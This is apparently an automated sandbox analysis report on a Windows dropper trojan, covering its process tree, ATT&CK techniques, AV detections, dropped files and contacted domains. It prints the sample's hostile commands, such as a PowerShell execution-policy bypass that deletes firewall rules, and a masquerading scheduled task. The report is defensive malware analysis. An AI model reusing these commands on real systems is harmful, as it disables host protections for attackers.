Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: Amcache.hve.22.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.22.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.22.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.22.dr | Binary or memory string: MsMpEng.exe
MITRE ATT&CK Matrix (numbers are the count of matching signatures per technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 31 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 12 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1545319; Sample: SecuriteInfo.com.Win32.Drop...; Startdate: 30/10/2024; Architecture: WINDOWS; Score: 100)
  • DNS/IP: nt89s.kro.kr, nt89.kro.kr
  • Signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 9 other signatures
  • SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe (started)
    • Dropped: C:\ProgramData\...\MicrosoftEdgeUpdate.exe (PE32); C:\ProgramData\Microsoft\...\iexplore.exe (PE32); C:\ProgramData\Microsoft\Bound.exe (PE32); SecuriteInfo.com.W....24481.7673.exe.log (CSV)
    • Signatures: Detected unpacking (changes PE section rights); Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender; Drops executable to a common third party application directory
    • MicrosoftEdgeUpdate.exe (started)
      • Signatures: Multi AV Scanner detection for dropped file
      • iexplore.exe (started)
        • Dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32); C:\Users\user\AppData\Local\...\select.pyd (PE32); C:\Users\user\AppData\Local\...\python37.dll (PE32); 73 other files (30 malicious)
        • conhost.exe (started)
        • iexplore.exe (started)
      • WerFault.exe (started)
    • Bound.exe (started)
      • Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Modifies the windows firewall
      • cmd.exe (started)
        • Signatures: Uses ping.exe to sleep
        • PING.EXE (started) -> 127.0.0.1 (unknown, unknown)
        • conhost.exe (started)
      • powershell.exe (started)
        • conhost.exe (started)
        • netsh.exe (started)
      • powershell.exe (started)
        • conhost.exe (started)
        • netsh.exe (started)
      • 2 other processes
        • 4 other processes
    • cmd.exe (started)
      • Signatures: Uses ping.exe to sleep; Uses schtasks.exe or at.exe to add and modify task schedules; Uses ping.exe to check the status of other devices and networks
      • 2 other processes
    • 4 other processes
      • Signatures: Uses netsh to modify the Windows network and firewall settings; Loading BitLocker PowerShell Module
      • WmiPrvSE.exe (started)
      • 4 other processes

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | 62% | ReversingLabs | Win32.Trojan.Leonem
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | 100% | Avira | HEUR/AGEN.1352253
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link
C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | 100% | Avira | TR/AVI.Agent.rrfxm
C:\ProgramData\Microsoft\Bound.exe | 100% | Avira | TR/AVI.Agent.lvnlf
C:\ProgramData\Microsoft\Bound.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Bound.exe | 62% | ReversingLabs | Win32.Trojan.Znyonm
C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | 58% | ReversingLabs | Win32.Trojan.Clyp
C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | 42% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\mat_wrapper\__init__.py | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\__init__.py | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dll | 4% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://contoso.com/License | 0% | URL Reputation | safe
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://crl.v | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nt89.kro.kr | unknown | unknown | false | | unknown
nt89s.kro.kr | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://onnx.ai/) | cv2.pyd.15.dr | false | | unknown
http://caffe.berkeleyvision.org/) | cv2.pyd.15.dr | false | | unknown
https://github.com/opencv/opencv/issues/23152. | cv2.pyd.15.dr | false | | unknown
https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/nativeVectorWidthIntdecode(img | cv2.pyd.15.dr | false | | unknown
http://torch.ch/) | cv2.pyd.15.dr | false | | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.dai.ed.ac.uk/CVonline/LOCAL_COPIES/MANDUCHI1/Bilateral_Filtering.html | cv2.pyd.15.dr | false | | unknown
https://gist.github.com/imneme/540829265469e673d045 | bit_generator.cp37-win32.pyd.15.dr | false | | unknown
http://www.math.sfu.ca/~cbm/aands/page_69.htm | _multiarray_umath.cp37-win32.pyd.15.dr | false | | unknown
https://github.com/opencv/opencv/issues/6293 | cv2.pyd.15.dr | false | | unknown
https://github.com/opencv/opencv/issues/16739 | cv2.pyd.15.dr | false | | unknown
https://www.tensorflow.org/ | cv2.pyd.15.dr | false | | unknown
https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us | cv2.pyd.15.dr | false | | unknown
https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2- | cv2.pyd.15.dr | false | | unknown
http://www.pcg-random.org/posts/random-invertible-mapping-statistics.html | _sfc64.cp37-win32.pyd.15.dr | false | | unknown
https://numpy.org/doc/stable/user/basics.subclassing.html | __init__.py4.15.dr | false | | unknown
http://pracrand.sourceforge.net/RNG_engines.txt | _sfc64.cp37-win32.pyd.15.dr | false | | unknown
https://github.com/torch/nn/blob/master/doc/module.md | cv2.pyd.15.dr | false | | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.dr | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pjreddie.com/darknet/) | cv2.pyd.15.dr | false | | unknown
http://torch.ch | cv2.pyd.15.dr | false | | unknown
https://www.tensorflow.org/lite | cv2.pyd.15.dr | false | | unknown
http://www.gdal.org/ogr_formats.html). | cv2.pyd.15.dr | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.00000274535BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC62B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8E07000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ipol.im/pub/algo/bcm_non_local_means_denoising | cv2.pyd.15.dr | false | | unknown
https://www.tensorflow.org/) | cv2.pyd.15.dr | false | | unknown
http://python.org/dev/peps/pep-0263/ | python37.dll.15.dr | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/opencv/opencv/issues/16739cv::MatOp_AddEx::assign4g | cv2.pyd.15.dr | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.math.sfu.ca/~cbm/aands/ | _multiarray_umath.cp37-win32.pyd.15.dr | false | | unknown
https://github.com/opencv/opencv/issues/6293u- | cv2.pyd.15.dr | false | | unknown
http://ocsp.thawte.com0 | select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.dr | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.22.dr | false | URL Reputation: safe | unknown
http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.html | bit_generator.cp37-win32.pyd.15.dr | false | | unknown
https://arxiv.org/abs/1704.04503 | cv2.pyd.15.dr | false | | unknown
http://campar.in.tum.de/Chair/HandEyeCalibration). | cv2.pyd.15.dr | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.ipol.im/pub/algo/bcm_non_local_means_denoising/ | cv2.pyd.15.dr | false | | unknown
http://www.gdal.org/formats_list.html) | cv2.pyd.15.dr | false | | unknown
https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/ | cv2.pyd.15.dr | false | | unknown
http://www.gdal.org) | cv2.pyd.15.dr | false | | unknown
http://homepages.inf.ed.ac.uk/rbf/HIPR2/hough.htm | cv2.pyd.15.dr | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/NVIDIA/caffe. | cv2.pyd.15.dr | false | | unknown
https://github.com/opencv/opencv/issues/5412. | cv2.pyd.15.dr | false | | unknown
https://onnx.ai/ | cv2.pyd.15.dr | false | | unknown
https://software.intel.com/openvino-toolkit) | cv2.pyd.15.dr | false | | unknown
http://underdestruction.com/2004/02/25/stackblur-2004. | cv2.pyd.15.dr | false | | unknown
http://caffe.berkeleyvision.org | cv2.pyd.15.dr | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745359C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D61334D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC628D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC6270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DC2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.v | powershell.exe, 0000001E.00000002.2218905322.0000019EDE230000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pjreddie.com/darknet/ | cv2.pyd.15.dr | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545319
Start date and time: 2024-10-30 12:24:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@55/112@18/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 27
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Bound.exe, PID 5180 because it is empty
• Execution Graph export aborted for target MicrosoftEdgeUpdate.exe, PID 280 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5900 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6176 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6376 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 736 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Time | Type | Description
07:25:19 | API Interceptor | 17x Sleep call for process: powershell.exe modified
07:25:55 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:25:30 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018} path: "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dll | https://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.html | malicious | Unknown
 | 201721443921282.exe | malicious | Unknown
 | 201721443921282.exe | malicious | Unknown
 | 201721443921282.exe | malicious | Unknown
 | 201721443921282.exe | malicious | Unknown
 | TwoToneDetect73.zip | malicious | Unknown
 | SecuriteInfo.com.Trojan.Win32.Agent.xbkxiv.21474.22109.exe | malicious | Unknown
 | dropped.exe | malicious | Unknown
 | 248786461py.exe | malicious | Unknown
 | 0801-1.exe | malicious | GhostRat
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 7168
Entropy (8bit): 4.318061163857967
Encrypted: false
